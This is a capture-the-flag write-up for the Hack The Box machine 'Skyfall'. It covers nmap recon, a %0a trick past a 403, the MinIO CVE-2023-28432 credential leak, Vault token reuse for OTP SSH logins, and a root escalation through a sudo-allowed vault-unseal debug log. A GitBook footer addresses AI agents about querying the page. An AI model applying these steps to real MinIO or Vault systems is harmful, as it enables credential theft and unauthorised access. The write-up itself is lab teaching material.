> For the complete documentation index, see [llms.txt](https://bunring.gitbook.io/ctf-writeups/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://bunring.gitbook.io/ctf-writeups/hack-the-box/2024/skyfall.md). # Skyfall {% embed url="" %} ## Recon Let's start with a nmap scan. {% code overflow="wrap" %} ``` ┌──(kali㉿kali)-[~] └─$ nmap -p- -T4 skyfall.htb Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-04-09 07:29 BST Nmap scan report for skyfall.htb (10.10.11.254) Host is up (0.041s latency). Not shown: 65533 closed tcp ports (conn-refused) PORT STATE SERVICE 22/tcp open ssh 80/tcp open http Nmap done: 1 IP address (1 host up) scanned in 11.01 seconds ┌──(kali㉿kali)-[~] └─$ nmap -p 22,80 -sC -sV -T4 skyfall.htb Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-04-09 07:31 BST Nmap scan report for skyfall.htb (10.10.11.254) Host is up (0.040s latency). PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.6 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 256 65:70:f7:12:47:07:3a:88:8e:27:e9:cb:44:5d:10:fb (ECDSA) |_ 256 74:48:33:07:b7:88:9d:32:0e:3b:ec:16:aa:b4:c8:fe (ED25519) 80/tcp open http nginx 1.18.0 (Ubuntu) |_http-title: Skyfall - Introducing Sky Storage! |_http-server-header: nginx/1.18.0 (Ubuntu) Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 8.10 seconds ``` {% endcode %} Let's visit the website. It look a cloud storage service. We are also able to find a team section and 3 email IDs. Directory enumeration uncovered multiple image assets, which are not deemed valuable. Subsequently, subdomain enumeration using ffuf revealed the presence of a subdomain named `demo.skyfall.htb`. Let's explore this subdomain to gather additional information.

## Initial Access We have a login page with demo login details: `guest:guest`.

On the left panel, there is an entry labeled "Min10 Metrics." However, attempting to access Min10 Metrics directly results in a 403 forbidden error. This access restriction can be circumvented by appending `%0a` at the end of the URL.

We can see a URL at the endpoint. ``` http://prd23-s3-backend.skyfall.htb/minio/v2/metrics/cluster ``` MinIO is reported to have the CVE-2023-28432 vulnerability, which entails an information leak risk. Exploiting this vulnerability can result in the exposure of sensitive information. We can use this github link to exploit this vulnerability: {% embed url="" %}

We've obtained: ``` "MINIO_ROOT_USER": "5Gr*****************" "MINIO_ROOT_PASSWORD": "Gkp*****************" ``` To install the Min10 client follow the steps at: {% embed url="" %} Now let’s execute the Min10 client. {% code overflow="wrap" %} ``` mc alias set myminio http://prd23-s3-backend.skyfall.htb/ 5Gr***************** Gkp***************** ``` {% endcode %} Let’s check for files. ``` mc ls -r --versions myminio ```

Here we can find some backup files with the .gz extension. Let's download those files and decompress them.

Upon further enumeration of files with the .gz extension, we found these. {% code overflow="wrap" %} ``` export VAULT_API_ADDR="http://prd23-vault-internal.skyfall.htb/" export VAULT_TOKEN="hvs.*****************************************" ``` {% endcode %}

To install Vault we have to Download the Vault Binary First. {% embed url="" %} Add “prd23-vault-internal.skyfall.htb” to the /etc/hosts file. Then, run the command as follows: {% code overflow="wrap" %} ``` export VAULT_ADDR="http://prd23-vault-internal.skyfall.htb/" export VAULT_TOKEN="hvs.**************************************************" ``` {% endcode %} We can log in now.

When we list the `SSH` roles, we see different roles, but for now we can only access `dev_otp_key_role`.

To obtain user access, execute the following code. An OTP will be generated, and use the OTP as the password for the SSH connection: ``` ./vault ssh -role dev_otp_key_role -mode otp askyy@10.10.11.254 ```

We've got our first flag. ## Privilege Escalation {% code overflow="wrap" %} ``` askyy@skyfall:~$ sudo -l Matching Defaults entries for askyy on skyfall: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty User askyy may run the following commands on skyfall: (ALL : ALL) NOPASSWD: /root/vault/vault-unseal ^-c /etc/vault-unseal.yaml -[vhd]+$ (ALL : ALL) NOPASSWD: /root/vault/vault-unseal -c /etc/vault-unseal.yaml ``` {% endcode %} Upon executing the following command, we observe the creation of a debug.log file.

Upon inspecting the debug.log file, we discover an additional Vault Token.

Next, we must substitute the Vault Token with a fresh one. ``` export VAULT_TOKEN=hvs.I0e********************* ``` Once the role has been configured as admin\_otp\_key\_role, we gain access to log in as root. {% code overflow="wrap" %} ``` vault ssh -role admin_otp_key_role -mode OTP -strict-host-key-checking=no root@10.10.11.254 ``` {% endcode %}

We are root and have our root flag. --- # Agent Instructions This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com. ## Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://bunring.gitbook.io/ctf-writeups/hack-the-box/2024/skyfall.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.